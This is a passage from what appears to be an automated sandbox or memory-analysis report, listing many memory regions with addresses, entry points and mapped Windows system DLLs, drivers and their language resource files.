"umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3441 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3442 start_va = 0xd10000 end_va = 0xd37fff monitored = 0 entry_point = 0xd11860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3443 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3444 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3445 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3446 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3447 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3448 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3449 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3450 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3451 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3452 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3453 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3454 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3455 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3456 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3457 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3458 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3459 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3460 start_va = 0x11f0000 end_va = 0x1fe4fff monitored = 0 entry_point = 0x12d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3461 start_va = 0x11f0000 end_va = 0x1fe4fff monitored = 0 entry_point = 0x12d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3462 start_va = 0x11f0000 end_va = 0x1299fff monitored = 0 entry_point = 0x1204100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3463 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3464 start_va = 0x11f0000 end_va = 0x1299fff monitored = 0 entry_point = 0x1204100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3465 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3466 start_va = 0xd10000 end_va = 0xd57fff monitored = 0 entry_point = 0xd4fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3467 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3468 start_va = 0xd10000 end_va = 0xd57fff monitored = 0 entry_point = 0xd4fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3469 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3470 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3471 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3472 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3473 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3474 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3475 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3476 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3477 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3478 start_va = 0xd10000 end_va = 0xd61fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32.dll.mui") Region: id = 3479 start_va = 0x11f0000 end_va = 0x133cfff monitored = 0 entry_point = 0x12f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3480 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3481 start_va = 0x11f0000 end_va = 0x133cfff monitored = 0 entry_point = 0x12f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3482 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3483 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3484 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3485 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3486 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3487 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3488 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3489 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3490 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3491 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3492 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3493 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3494 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3495 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3496 start_va = 0xe30000 end_va = 0xe83fff monitored = 0 entry_point = 0xe43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3497 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3498 start_va = 0xe30000 end_va = 0xe83fff monitored = 0 entry_point = 0xe43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3499 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3500 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3501 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3502 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3503 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3504 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3505 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3506 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3507 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3508 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3509 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3510 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3511 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3512 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3513 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3514 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3515 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3516 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3517 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3518 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3519 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3520 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3521 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3522 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3523 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3524 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3525 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3526 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3527 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3528 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3529 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3530 start_va = 0x11f0000 end_va = 0x12cbfff monitored = 0 entry_point = 0x1265ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3531 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3532 start_va = 0x11f0000 end_va = 0x12cbfff monitored = 0 entry_point = 0x1265ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3533 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3534 start_va = 0x11f0000 end_va = 0x12d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3535 start_va = 0xd70000 end_va = 0xd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3536 start_va = 0x11f0000 end_va = 0x12d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3537 start_va = 0xd70000 end_va = 0xd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3538 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3539 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3540 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3541 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3542 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3543 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3544 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3545 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3546 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3547 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3548 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3549 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3550 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3551 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = 